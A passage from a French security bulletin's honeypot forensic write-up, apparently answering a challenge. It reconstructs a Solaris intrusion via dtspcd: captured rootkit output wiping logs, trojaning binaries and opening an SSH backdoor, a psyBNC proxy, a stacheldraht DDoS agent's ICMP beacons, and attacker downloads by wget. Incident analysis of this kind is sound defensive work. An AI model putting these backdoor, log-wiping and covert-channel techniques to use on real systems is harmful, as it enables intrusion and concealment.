/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
...
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
...
/var/log/spooler.4: No such file or directory
LogZ Cancellati...
Delete LogZ by warning
Starting up at: 1038585350
Installing from /usr/share/man/man1/.old/sol
Will erase /usr/share/man/man1/.old/sol after install
Checking for existing rootkits..
Checking for existing rootkits..
checking /etc/rc2 and /etc/rc3 for rootkits...
Rootkits Removed from config files
checking crond configs for rootkits...
Rootkits Removed from crond config files
*** WARNING *** suspicious files found in /dev
Insert Rootkit Password : mixer
Using Password mixer
Insert Rootkit SSH Port : 5001
Using Port 5001
Insert Rootkit PsyBNC Port : 7000
Using Port 7000
File processed...
Making backups...
su ping du passwd find ls netstat strings ps Done.
Installing trojans...
login sshd netstat ls find strings du passwd ping su
Complete.
Suid removal
at atq atrm eject fdformat rdist rdist admintool ufsdump
ufsrestore quota ff.core lpset lpstat netpr arp chkperm
Complete.
PS Trojaned
Primary network interface is of type: hme
Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn
README
Done.
psyBNC has now been configured on port 7000 with no IDENT
Starting Patcher...
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
-> Une dédicace en italien
-> Phase N°1 : Destruction des journaux
-> Phase N°2 : Piégeage du système
Recherche de ‘rootkits’ préexistants et
désinstallation de ceux-ci
-> Phase N°4 : Configuration du ‘rootkit’
- Mot de passe
- Porte dérobée SSH sur TCP/5001
- Proxy IRC sur TCP/7000
-> Phase N°5 : Sauvegarde et installation
Sauvegarde
Substitution
Confirmation du piégeage de ‘ps’
Confirmation de l’installation du proxy
-> Phase N°6 : Sécurisation du système
Page 55/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.
09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done.
==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)
0K-> ......... ......... ......
[100%]
09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]
Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
...
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture
and version of a package which is already installed. This
installation will attempt to overwrite this package.
PaTcH_MsG 2 Patch number 111085-02 is already applied.
Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done.
==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)
0K-> .......... ......... ......... ......... ......... [ 4%]
50K-> .......... ......... ......... ......... ......... [ 9%]
...
950K-> .......... ......... ......... ......... ......... [ 99%]
1000K->.......
10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]
Archive: 108949-07.zip
creating: 108949-07/
inflating: 108949-07/.diPatch
...
inflating: 108949-07/postpatch
inflating: 108949-07/README.108949-07
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture
and version of a package which is already installed. This
installation will attempt to overwrite this package.
Installation of <SUNWdtbas> was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture
and version of a package which is already installed. This
installation will attempt to overwrite this package.
Installation of <SUNWdtbax> was successful.
Archive: 111606-02.zip
creating: 111606-02/
inflating: 111606-02/.diPatch
...
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
inflating: 111606-02/README.111606-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture
and version of a package which is already installed. This
installation will attempt to overwrite this package.
Installation of <SUNWftpu> was successful
Erasing rootkit...
#./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o ||
\| || ,--'
| _/ _\ \
\ / | o< | |\
|| |__
|_| |____/
|__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Liste des correctifs à appliquer
Acquisition du correctif N°1 sur le site SUN
Décompression du correctif 111085-02
Le correctif 111085-02 est déjà installé !
Acquisition du correctif N°2 sur le site SUN
Décompression du correctif 108949-07
-> Installation effectuée
-> Installation effectuée
Décompression du correctif 111606-02
-> Installation effectuée
-> Phase N°7 : Destruction des fichiers
Initialisation du proxy IRC
dans sa version 2.2.1
Page 56/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
psyBNC installed - loaded on reboot :>
#cd ..
#./solbnc
#./dlp
Delete LogZ by bobbino
Deleting /var/log...
/var/log/secure: No such file or directory
...
/var/log/boot.log: No such file or directory
...
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
...
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
...
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
...
/var/log/spooler.4: No such file or directory
LogZ Cancellati...
Delete LogZ by bobbino
Root
167
1 0
Nov 16 ?
0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ?
0:00 grep inetd
Patch.....
Attivata by RyO
#
Changement de répertoire
Lancement du proxy IRC
Destruction des traces
Encore une signature mais en roumain
L’étude détaillée de l’activité de l’attaquant sur la session ouverte via la porte dérobée activée sur le port
‘TCP/1524’ nous permet de confirmer les hypothèses initiales concernant l’installation d’un proxy ‘IRC’ actif sur
le port TCP/7000 mais ne nous donne aucune information concernant les sessions ‘IRC’ ouvertes vers le port
TCP/5555.
Nous apprenons par ailleurs :
- qu’une porte dérobée SSH est activée sur le port TCP/5001,
- que le système est désormais sécurisé par l’application des correctifs en provenance directe de SUN,
- que le module ‘ipv6sun’ n’a pas encore été activé
- que toutes les traces des manipulations effectuées ont été effacées,
- que le proxy IRC installé, dénommé ‘PsyBNC’, journalise des informations dans le répertoire ‘log/psybnc.log’,
- que le pseudo de l’attaquant est ‘bobzz’ et qu’il dispose d’un accès sur les systèmes ‘61.219.90.180’,
‘62.211.66.16’ et ‘62.211.66.53’. On notera que le bloc d’adresses associé est géré par ‘Telecom Italia’.
Une recherche sur Internet avec ces différents éléments nous conduit sur le site d’une équipe de pirates roumains
(‘http://linuxgov.freehomepage.com/’) proposant un rootkit dénommé ‘sol.tar.gz’ (inaccessible au moment de
l’écriture de cet article) mais aussi un article sur l’utilisation de ‘PsyBNC’ et enfin un jeu dénommé ‘BOB’. Ces
éléments laissent à penser que nous pourrions avoir identifié la source du ‘rootkit’ voire peut être l’auteur de
l’attaque.
Alertes Syslog
29 Novembre 2003 – 16h53
Le positionnement d’un filtre éliminant le trafic déjà analysé nous permet de mettre en évidence les activités ayant
pu être engagées durant la fenêtre correspondant à l’attaque (Trames 561 à 8351).
not ip.addr eq 62.211.66.53 and not ip.addr eq 62.211.66.16 and not ip.addr eq 61.219.90.180 and
not ip.addr eq 192.18.99.122 and
not dns
Systèmes contrôlés
Site SUN
Requêtes DNS
Ce filtre permet d’identifier trois trames ‘syslog’ envoyées par le système cible à destination de l’adresse
‘192.168.100.28’ correspondant à un système dans le plan d’adressage local.
Trame
5416
5419
5429
Source
192.168.100.28
192.168.100.28
192.168.100.28
Service
UDP/514
Donnée
Warning ‘inetd … /usr/dt/bin/rpc.cms: killed’
Warning ‘inetd … /usr/sbin/admind: killed’
Warning ‘inetd … /tmp/x: no such file or directory’
Ces trois messages d’alertes sont directement liés à la phase initiale de l’attaque correspondant à l’exploitation du
débordement de buffer dans le service ‘dtspcd’. Ces messages qui sont on ne peut plus significatifs d’une
tentative réussie de compromission doivent, normalement, provoquer une réaction immédiate de la part de
l’exploitant.
Annonces ICMP
29 Novembre 2003 – 17h01
Immédiatement après que le ‘rootkit’ ait été installé, une activité ‘ICMP’ est engagée par le système compromis à
destination des systèmes ‘217.116.38.10’ et ‘61.134.3.11’. Le positionnement d’un filtre dédié nous permet de
découvrir qu’il s’agit d’une activité de fond régulière consistant en l’envoi toutes les 61 secondes d’une réponse
‘ICMP’ contenant la chaîne de caractère ‘skillz’.
Trame
Source
Service
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Donnée
Page 57/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
8355
8356
192.168.100.28
192.168.100.28
18818
192.168.100.28
ICMP
Echo Reply ‘skillz’
Echo Reply ‘skillz’
Echo Reply ‘skillz’
Sont ainsi envoyés quelques 846 paquets vers le système ‘217.116.38.10’ et 846 paquets vers le système
‘61.134.3.11’ sur la période de journalisation du premier jour. En temps normal, un paquet ‘ICMP Echo reply’
n’est transmis qu’à la suite de la réception d’une requête ‘ICMP Echo’, requête qui sera généralement filtrée en
amont par les dispositifs de sécurité.
L’activité ici détectée est donc anormale. Il s’agit d’un procédé désormais classique permettant d’établir un
protocole d’échange sur le protocole ‘ICMP’ en passant à travers les dispositifs de filtrage sans gestion d’état qui
se conteraient donc de filtrer la requête.
Une recherche sur l’Internet avec les mots clefs ‘ICMP’ et ‘skillz’ nous apprend que cette activité est celle d’un
outil de déni de service installé en lieu et place du service ‘dtspcd’ original et intégrant le client ‘stacheldraht’.
Celui communique avec son contrôleur – ici installé sur les systèmes ‘217.116.38.10’ et ‘61.134.3.11’ par le
biais de réponses ICMP contenant la signature ‘skillz’, le contrôleur envoyant ses commandes par le même
procédé mais en utilisant la signature ‘ficken’.
Activité IRC
29 Novembre 2003 – 17h04
Nous pouvons maintenant compléter notre filtre pour éliminer le trafic et mettre en évidence une première activité
‘IRC’ engagée par le système ‘80.117.14.44’.
Trame
8362
8363
8364
8365
Source
80.117.14.44
192.168.100.28
80.117.14.44
80.117.14.44
16900
80.117.14.44
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
PASS fargetta
Paquet ‘RST’
Rappelons pour la bonne compréhension de l’analyse que l’attaquant s’est connecté à un proxy, c’est-à-dire à un
service assurant le relayage de ses commandes vers le serveur IRC final, à savoir le système ‘irc-1.stealth.net’.
Nous devrions donc détecter un second flux ‘IRC’ établi entre le proxy et le serveur ‘IRC’ final.
Le positionnement d’un filtre ad’hoc permet de confirmer cette hypothèse et d’identifier le port utilisé, à savoir le
port ‘TCP/5555’ !
Trame
8564
8566
8567
8568
Source
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Service
TCP/5555
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 :ownz
206.252.192.195
ERROR : Closed link
8587
8589
8590
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 :ownz
8614
206.252.192.195
ERROR : Closed link
8621
8623
8624
8625
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 :ownz
8631
206.252.192.195
Message ‘irc.stealth.net: 1 Welcome to the Internet Relay …’
192.168.100.28
Paquet ‘RESET’
16892
L’analyse des échanges effectués entre le proxy et le serveur ‘IRC’ met en évidence l’existence de deux tentatives
de connexion rejetées pour cause de saturation du service. La troisième tentative est la bonne et l’attaquant est
connecté sur le réseau ‘irc.stealth.net’ depuis un système identifié comme connecté sur un accès géré par le FAI
Italien ‘Interbusiness’: ‘host44-14.pool80117.interbusiness.it’.
Nous avons désormais la possibilité de reconstituer l’ensemble des échanges en identifiant les actions engagées
par l’attaquant et leur traduction par le proxy. Le volume de données échangées – 145Ko – nous conduit à
travailler prioritairement sur les échanges effectués entre le proxy et le serveur ‘IRC’. L’analyse de ceux-ci
confirme l’utilisation de la langue italienne par l’attaquant ainsi que l’utilisation de ce réseau ‘IRC’ par une
communauté de pirates Italiens.
La teneur des échanges est peu intéressante à l’exception de quelques conversations portant sur l’utilisation du
protocole IP V6 et plus particulièrement de l’utilitaire ‘ping6‘. On y apprend aussi l’existence d’un réseau ‘IRC IP
V6’ dénommé ‘ThE iRc FrIeNdS’ accessible via le serveur ‘irc6.edisontel.it’.
On notera que l’étude des conversations acquises sous la forme de données ‘brutes’ est une tâche d’autant plus
fastidieuse qu’il n’existe encore aucun outil d’aide à l’analyse permettant notamment de présenter les échanges
sous une forme facilitant leur lecture.
L’utilisation d’un filtre éliminant les éléments déjà analysés permet de s’assurer qu’aucun événement important
n’a été oublié.
Conclusion partielle
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 58/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
L’attaquant, probablement un Italien ou un Roumain utilisant le pseudonyme ‘bobz’, a pris le contrôle du système
cible, un SUN, en exploitant un débordement de buffer présent dans le service ‘dtspcd’. A l’aide d’un outil de type
‘rootkit’, l’attaquant a piégé cette machine en installant une porte dérobée SSH a priori non utilisée ainsi qu’un
proxy IRC. Les traces de cette compromission ont été masquées en détruisant les fichiers de journalisation et en
installant une version modifiée des principaux utilitaires systèmes. Enfin, le service ‘dtspcd’ original a été remplacé
par un agent de déni de service distribué de type ‘stacheldraht’, agent a priori non encore activé.
Les systèmes suivants ont été utilisés par l’attaquant:
Adresse IP
61.219.90.180
62.211.66.16
62.211.66.53
61.134.3.11
217.116.38.10
80.117.14.44
Nom DNS
61-219-90-180.HINET-IP.hinet.net
inconnu
inconnu
Inconnu
nocfft1.etel.hu
host44-14.pool80117.interbusiness.it
FAI:
FAI:
FAI:
Sté:
FAI:
FAI:
Propriétaire des adresses
Chunghwa Telecom Co. (Chine)
Telecom Italia
Telecom Italia
SNXIAN (Chine)
eTel Hungary
Telecom Italia
Utilisation
Compromission initiale
Transfert FTP de wget, …
Transfert HTTP du rootkit
Contrôleur du client DDoS
Client IRC
Jour N°3
Comme à notre habitude, nous référencerons ces évènements par le numéro du paquet associé.
Activité DNS
01 Décembre 2003 – 07h26
Une activité DNS soutenue continue d’être constatée qui porte dans certains cas sur des systèmes référencés dans
les conversations ‘IRC’. Aucun autre élément ne permet d’aller plus en avant dans l’analyse.
Activité IRC N°1
01 Décembre 2003 – 13h51
Une activité ‘IRC’ est détectée à 13h51 en provenance du système ayant pour adresse ‘80.117.14.222’. Une
rapide vérification de l’allocation de celle-ci confirme qu’elle appartient au même pool d’adresses que l’adresse
‘80.117.14.44’ utilisée deux jour plus tôt.
Trame
1184
1185
1186
1188
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
123122
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
PASS fargetta
Paquet ‘ACK’
Cette activité est ici encore liée à l’utilisation du proxy ‘IRC’ et génère en conséquence un second trafic de 148Ko
vers le port ‘TCP/5555’ et toujours vers le serveur ‘irc-1.stealth.net’.
Trame
1213
1215
1216
1217
1225
Source
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
206.252.192.195
112777
192.168.100.28
Service
TCP/5555
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 ‘Tony-H- H :O nz’
Message ‘irc.stealth.net: 1 Welcome to the Internet Relay …’
Paquet ‘RESET’
L’analyse des conversations nous montre l’activité classique d’un canal ‘IRC’, ici le canal ‘#bobz’: papotages
divers et variés d’un groupe de pirates italiens mais a priori (nous ne lisons pas l’italien) sans grand rapport avec
le piratage. On note cependant la présence d’interlocuteurs annoncés avec une adresse IPV6 tels que :
[email protected]
DarkStar@3ffe:80ee:fd5:0:0:0:0:56
ChMoD@2001:6b8:0:400:0:0:0:31f6
Annonces ICMP
01 Décembre 2003 – 20h20
Les annonces ‘ICMP’ provenant de l’installation d’un client ‘DDoS’ en lieu et place du service ‘dtspcd’ continuent
d’être régulièrement transmises vers les systèmes ‘61.134.3.11’ et ‘217.116.38.10’. A partir de 20h20, le système
‘61.134.3.11’ se met à répondre aux sollicitations du client par le biais de réponse ‘ICMP’ contenant la chaîne
‘ficken’.
Trame
4746
4747
4984
Source
192.168.100.28
61.134.3.11
Service
ICMP
61.134.3.11
Donnée
Reply ‘skillz’
Reply ‘ficken’
Reply vide
Peu de temps après, le système compromis se met à sonder le système ‘195.130.233.20’ au moyen de quelques
4701 requêtes ‘ICMP Echo Request’.
4988
4989
4991
61.134.3.11
192.168.100.28
49366
ICMP
ICMP
Reply vide
Ping echo request à destination de ‘195.130.233.20’
Ping echo request à destination de ‘195.130.233.20’
ICMP
Ping echo request à destination de ‘195.130.233.20’
L’une des commandes ‘ficken’ transmises par le contrôleur est probablement à l’origine de ce sondage et du
sondage UDP/TCP effectué en parallèle. Nous n’avons hélas pas identifié la trame contenant cette (ces)
commande(s) en argumentant à notre décharge le volume de données à traiter (123123 trames).
On notera que la signature des commandes change régulièrement en passant par les trois valeurs: vide, ‘ficken’
et ‘niggahbitch’.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 59/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Trame
48524
Source
61.134.3.11
85278
61.134.3.11
Service
ICMP
Donnée
Reply ‘niggahbitch’
Reply ‘ficken’
Le lecteur pourra se reporter à l’excellente analyse de l’outil ‘stacheldraht’ proposée par David Dittrich sur la
page ‘http://staff.washington.edu/dittrich/misc/stacheldraht.analysis’.
Sondage UDP/TCP
01 Décembre 2003 – 20h41
Un sondage TCP/UDP de type ‘NULL flags’ est engagé à 20h41 à destination du système ‘javairc.tiscali.it’ ayant
pour adresse ‘195.130.233.20’. Ce sondage s’arrête à 21h58.
Trame
4990
Source
192.168.100.28
Service
TCP
Donnée
Paquet ‘NULL’
85249
192.168.100.28
TCP
Paquet ‘NULL’
Une caractéristique particulière de ce sondage réside dans la présence de paquets contenant les options de service
IP positionnées (ECN-CE et ECT), signature caractéristique de l’utilisation de l’outil ‘nmap’.
Connexion SSH N°1
01 Décembre 2003 – 23h41
Une connexion SSH d’une durée d’environ 9h est établie depuis le système ‘62.101.108.86’ à destination de la
porte dérobée ‘SSH’ active sur le port ‘TCP/5001’. L’utilisation de l’option ‘Decode as’ permet de visualiser la
nature des paquets échangés mais bien entendu, pas le contenu de la session (22Ko) !
Trame
112519
112520
112521
Source
62.101.108.86
192.168.100.28
62.101.108.86
Service
TCP/5001
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
112529
112533
62.101.108.86
192.168.100.28
Annonce protocole client : ‘SSH-1.5-1.2.25’
Annonce protocole serveur: ‘%SSH-1.5-OpenSSH_3.0.p1’
112535
112542
192.168.100.28
62.101.108.86
Présentation certificat public du serveur
Négociation clef de session SSHv1
117186
117187
192.168.100.28
Paquet ‘FIN/ACK’
Paquet ‘ACK’
Echanges chiffrés
Les dernières trames de cette session correspondent à une terminaison ‘abrupte’ initiée par le serveur. Les
trames suivantes nous fourniront un indice sur l’origine de cette terminaison.
Alertes Syslog
02 Décembre 2003 – 08h44
Un filtre permet d’identifier 63 trames ‘syslog’ envoyées en interne par le système cible à destination de l’adresse
‘192.168.100.28’ correspondant à la réinitialisation du système par l’utilisateur ‘root’.
Nous avons ainsi
confirmation qu’il s’agit bien d’une plate-forme SUN Ultra 5 tournant à 360Mhz et doté de 131Mo de mémoire …
Trame
117184
Source
192.168.100.28
117334
192.168.100.28
Service
UDP/514
Donnée
Critical ‘rebooted by root’
Warning ‘mail alert …’
Nous ne pouvons que formuler une hypothèse quant au contenu de la session ‘SSH’: l’attaquant a installé un
paquetage nécessitant le redémarrage du serveur, peut être bien le module IPV6. Si tel est le cas, nous devrions
constater une activité IP V6 dans les prochaines trames.
Connexion HTTP
01 Décembre 2003 –23h56
Une activité HTTP est constatée durant la session ‘SSH’ durant laquelle le système compromis se connecte au
serveur ‘62.211.66.55’ et rapatrie le fichier ‘psy.tar’ en utilisant l’outil ‘wget’. Ce transfert, initié à 23h56 se
termine 5 heures plus tard à 5h11 du matin expliquant la durée inhabituelle de la connexion ‘SSH’ à partir de
laquelle le transfert a probablement été engagé.
Trame
112906
Source
192.168.100.28
117408
62.211.66.55
Service
TCP/80
Donnée
GET ‘/bobzz/psy.tar … User-Agent: wget/1.5.3 …’
Fin de transfert
L’extraction des données de ce flux au moyen de l’outil ‘tcpflow’ nous permet de reconstituer l’archive et
d’identifier celle-ci: il s’agit d’une nouvelle version du proxy IRC ‘PsyBNC’. La version ‘2.3.1’ est ainsi installée en
lieu et place de la version ‘2.2.1’ initialement utilisée. On notera que le séquencement des actions est concordant
puisque la première activité IRC s’est terminée avec la Trame 112777 donc juste avant la récupération du
nouveau paquetage.
Connexion SSH N°2
02 Décembre 2003 – 11h29
Une connexion SSH est de nouveau établie après le redémarrage du serveur.
Trame
117271
117272
117273
Source
62.101.108.86
192.168.100.28
62.101.108.86
Service
TCP/5001
117278
117280
62.101.108.86
192.168.100.28
Annonce protocole client : ‘SSH-1.5-1.2.25’
Annonce protocole serveur: ‘%SSH-1.5-OpenSSH_3.0.p1’
117282
192.168.100.28
Présentation certificat public du serveur
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
Page 60/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
117283
62.101.108.86
Négociation clef de session SSHv1
117554
117557
192.168.100.28
62.101.108.86
Paquet ‘FIN/ACK’
Paquet ‘ACK’
Echanges chiffrés
A cette étape de l’analyse, nous n’avons aucune idée des actions qui ont pu être engagées par l’attaquant mais il
est fort probable qu’il ait relancé la nouvelle version du proxy ‘PsyBNC’.
Activité IRC N°2
02 Décembre 2003 – 12h40
Une heure plus tard, une activité ‘IRC’ est de nouveau détectée toujours en provenance du même système. On
notera que le mot de passe protégeant l’accès au proxy IRC a été changé.
Trame
117558
117559
117560
117561
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
PASS campini
117605
80.117.14.222
ADDSERVER 2001:750:2:0:202:a5ff:fef0:aac7 port 6667
117745
80.117.14.222
Paquet ‘RST’
Cette activité génère en conséquence un second trafic de 118Ko à destination du port ‘TCP/6667’ du serveur
‘2001:750:2:0:202:a5ff:fef0:aac7’ par ailleurs dénommé ‘irc6.edisontel.it’. Rappelons que ce serveur avait
fait l’objet d’une conversation durant la première session IRC.
Trame
117614
117617
117618
117623
Source
192.168.100.28
2001:750:2:0…
192.168.100.28
192.168.100.28
123123
192.168.100.28
Service
TCP/6666
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 :ownz
Paquet ‘RESET’
L’analyse des conversations nous montre que l’attaquant commence par reconfigurer le proxy pour router le trafic
vers un serveur ‘IRC’ accessible en IP V6 puis engage une courte conversation visant probablement à vérifier le
bon fonctionnement du proxy mais aussi de la pile IP V6 installée sur le système compromis.
Un fois ce point validé, il quitte la session IRC puis se reconnecte quelque temps plus tard pour rejoindre le canal
‘capacio’ et continuer ses discussions habituelles.
Trame
119261
119262
119263
119265
Source
80.117.14.222
192.168.100.28
80.117.14.222
80.117.14.222
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
PASS campini
119277
119279
192.168.100.28
80.117.14.222
USER ahaa bobz 192.168.100.28 -:Ownz
Message ‘irc6.edistontel.it: 1 Welcome to the Internet Relay …’
123122
80.117.14.222
Paquet ‘ACK’
On notera que durant la période de la déconnexion du client ‘IRC’, le proxy a maintenu une session ‘suspendue’
sur le serveur ‘irc6.edistontel.it’, l’interlocuteur étant simplement annoncé ‘away’.
Conclusion partielle
Les objectifs de l’attaquant semblent être simplement de disposer d’un relais IRC pour ses conversations
courantes en testant la possibilité d’accéder à des serveurs fonctionnant sous IP V6. Nous ne pouvons affirmer que
l’exploitation de l’outil en déni de service est le fait de l’attaquant mais nous pensons qu’il résulte plutôt d’un effet
de bord provoqué par l’utilisation d’un ‘rootkit’ configuré par défaut.
Les systèmes suivants ont été utilisés par l’attaquant:
JOUR 1
Adresse IP
61.219.90.180
62.211.66.16
62.211.66.53
61.134.3.11
217.116.38.10
80.117.14.44
JOUR 3
Adresse IP
80.117.14.222
62.101.108.86
62.211.66.55
195.130.233.20
Nom DNS
61-219-90-180.HINET-IP.hinet.net
inconnu
inconnu
inconnu
nocfft1.etel.hu
host44-14.pool80117.interbusiness.it
FAI:
FAI:
FAI:
Sté:
FAI:
FAI:
Propriétaire des adresses
Chunghwa Telecom Co. (Chine)
Telecom Italia
Telecom Italia
SNXIAN (Chine)
eTel Hungary
Telecom Italia
Utilisation
Compromission initiale
Transfert FTP de wget, …
Transfert HTTP du rootkit
Contrôleur du client DDoS
Nom DNS
host44-14.pool80117.interbusiness.it
inconnu
inconnu
javairc.tiscali.it
FAI:
FAI:
FAI:
FAI:
Propriétaire des adresses
Telecom Italia
FastWeb Networks Italia
Telecom Italia
Tiscali
Utilisation
Client IRC
Connexion SSH
Transfert HTTP de ‘psy.tar’
Cible du sondage
Client IRC
Avant de répondre point par point aux questions initiales du défi, un synoptique présentant les acteurs et un
diagramme récapitulatif du séquencement de l’attaque permettra au lecteur (et au rédacteur) de reprendre ses
esprits.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 61/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
A
Premier jour
A.B.C.D
4
80.117.14.44
pool80117.interbusiness.it
3
Systèmes probablement
compromis par l’attaquant
5
6
80.117.14.222
pool80117.interbusiness.it
62.101.108.86
62.211.66.53
7a) Chat IRC
Client->Proxy
2
7
4) Transfert rootkit
sol.tar.gz
62.211.66.16
62.211.66.55
2) Transfert outils
1
8
wget, ipv6sun,...
S
61.219.90.180
HINET-IP.hinet.net
1) Attaque ‘dtspcd’
195.130.233.30
javairc.tiscali.it
5) Transfert patchs
Installation
sécurisation serveur
192.168.100.28
Pot de Miel
aka ‘Zoberius’
7b) Chat IRC
Proxy->Serveur
a
b
6) Annonces ICMP
Outil DDoS ‘stachelDraht’
61.134.3.11
Systèmes potentiellement
compromis par l’attaquant
irc1.stleath.net
sun.com
217.116.38.10
nocfft1.etel.hu
irc6.edisontel.it
On notera que l’attaquant dispose à coup sûr de deux accès sur des systèmes - ‘61.219.90.180’ et
’44.14.pool80117.interbusiness.it’ - dont il est raisonnable de penser qu’ils aient été compromis.
A
Troisième jour
A.B.C.D
4
3
Systèmes probablement
compromis par l’attaquant
5
80.117.14.44
pool80117.interbusiness.it
80.117.14.222
pool80117.interbusiness.it
1a) Chat IRC N°1
4) Connexion SSH N°1
62.101.108.86
66.211.66.53
2
Installation proxy IRC IPV6
Réinitialisation système
Client->Proxy
62.211.66.16
6
6) Connexion SSH N°2
Activation nouveau proxy
7a) Chat IRC N°2
Client->Proxy
7
62.211.66.55
1
8
S
61.219.90.180
HINET-IP.hinet.net
5) Transfert proxy IRC IIPV6
PsyBNC
192.168.100.28
Pot de Miel
aka ‘Zoberius’
195.130.233.30
javairc.tiscali.it
3) Sondage
ICMP/UDP/TCP
a
b
2) Annonces ICMP
Outil DDoS ‘stachelDraht’
61.134.3.11
Systèmes potentiellement
compromis par l’attaquant
1b) Chat IRC N°1
7b) Chat IRC N°2
Client->Proxy
Client->Proxy
irc1.stleath.net
sun.com
217.116.38.10
nocfft1.etel.hu
irc6.edisontel.it
Deux nouveaux systèmes - ‘62.101.108.86’ et ‘222.14.pool80117.interbusiness.it’ - apparaissent ici comme
probablement compromis.
Veille Technologique Sécurité N°58
© APOGEE Communications - Tous droits réservés
Page 62/65
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mai 2003
Réponse aux questions
Arrivé à ce niveau de l’analyse, nous disposons de la majorité des éléments permettant de répondre aux questions:
1. Quel est le système d’exploitation utilisé par le pot de miel, comment pouvez-vous le déterminer ?
Les réponses aux requêtes émises vers le service ‘dtsvcd’ nous informent:
- que le système cible est un système UNIX car ce service ‘CDE’ n’est utilisé que dans cet environnement
- et plus précisément que le système d’exploitation est un SunOS 5.8 sur une plate-forme Sun Ultra 5 ou 10.
2. Comment l’attaquant a t-il opéré pour rentrer dans le système ?
L’attaquant exploite un débordement de buffer présent dans le service ‘dtsvcd’. Il peut ainsi faire exécuter son
